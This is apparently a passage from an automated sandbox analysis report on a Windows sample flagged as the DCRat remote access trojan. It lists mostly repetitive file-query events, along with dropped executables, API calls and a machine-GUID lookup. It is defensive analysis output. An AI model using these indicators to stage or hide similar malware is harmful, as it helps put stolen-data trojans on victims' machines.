                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\mshypercomponentSavesdll\agentFont.exeQueries volume information: C:\mshypercomponentSavesdll\agentFont.exe VolumeInformation
                                Source: C:\mshypercomponentSavesdll\agentFont.exeQueries volume information: C:\mshypercomponentSavesdll\agentFont.exe VolumeInformation
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeQueries volume information: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe VolumeInformation
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeQueries volume information: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe VolumeInformation
                                Source: C:\mshypercomponentSavesdll\agentFont.exeQueries volume information: C:\mshypercomponentSavesdll\agentFont.exe VolumeInformation
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8EF2C5C CreateEventW,CreateNamedPipeW,0_2_00007FF7B8EF2C5C
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F1FFD0 GetCurrentProcess,SetUserObjectInformationW,GetCommandLineW,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7B8F1FFD0
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F04224 GetVersionExW,0_2_00007FF7B8F04224
                                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                Stealing of Sensitive Information

                                barindex
                                Yara detected DCRat
